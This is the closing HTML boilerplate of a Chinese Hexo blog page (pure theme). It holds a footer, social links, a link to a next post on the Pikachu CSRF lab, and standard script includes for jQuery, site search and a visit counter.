        <div>个人简介。</div>
      </div>
    </figure>
  </div>
</div>


    </div>
  </article>
  
    
  <section id="comments">
  	
  </section>


  
</div>

  <nav class="bar bar-footer clearfix" data-stick-bottom>
  <div class="bar-inner">
  
  <ul class="pager pull-left">
    
    
    <li class="next">
      <a href="/2024/04/25/pikachu%E4%B9%8BCSRF/" title="pikachu之CSRF"><span>下一篇&nbsp;&nbsp;</span><i class="icon icon-angle-right" aria-hidden="true"></i></a>
    </li>
    
    
  </ul>
  
  
  
  <div class="bar-right">
    
    <div class="share-component" data-sites="qq,wechat" data-mobile-sites="qq,qzone"></div>
    
  </div>
  </div>
</nav>
  


</main>

  <footer class="footer" itemscope itemtype="http://schema.org/WPFooter">
	
	
    <ul class="social-links">
    	
        <li><a href="https://github.com/corsnail" target="_blank" title="Github" data-toggle=tooltip data-placement=top><i class="icon icon-github"></i></a></li>
        
        <li><a href="/atom.xml" target="_blank" title="Rss" data-toggle=tooltip data-placement=top><i class="icon icon-rss"></i></a></li>
        
    </ul>

    <div class="copyright">
    	
        <div class="publishby">
        	Theme by <a href="https://github.com/cofess" target="_blank"> cofess </a>base on <a href="https://github.com/cofess/hexo-theme-pure" target="_blank">pure</a>.
        </div>
    </div>
</footer>
  <script src="//cdn.jsdelivr.net/npm/jquery@1.12.4/dist/jquery.min.js"></script>
<script>
window.jQuery || document.write('<script src="js/jquery.min.js"><\/script>')
</script>

<script src="/js/plugin.min.js"></script>


<script src="/js/application.js"></script>


    <script>
(function (window) {
    var INSIGHT_CONFIG = {
        TRANSLATION: {
            POSTS: '文章',
            PAGES: '页面',
            CATEGORIES: '分类',
            TAGS: '标签',
            UNTITLED: '(未命名)',
        },
        ROOT_URL: '/',
        CONTENT_URL: '/content.json',
    };
    window.INSIGHT_CONFIG = INSIGHT_CONFIG;
})(window);
</script>

<script src="/js/insight.js"></script>






   
<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>





   






</body>
</html>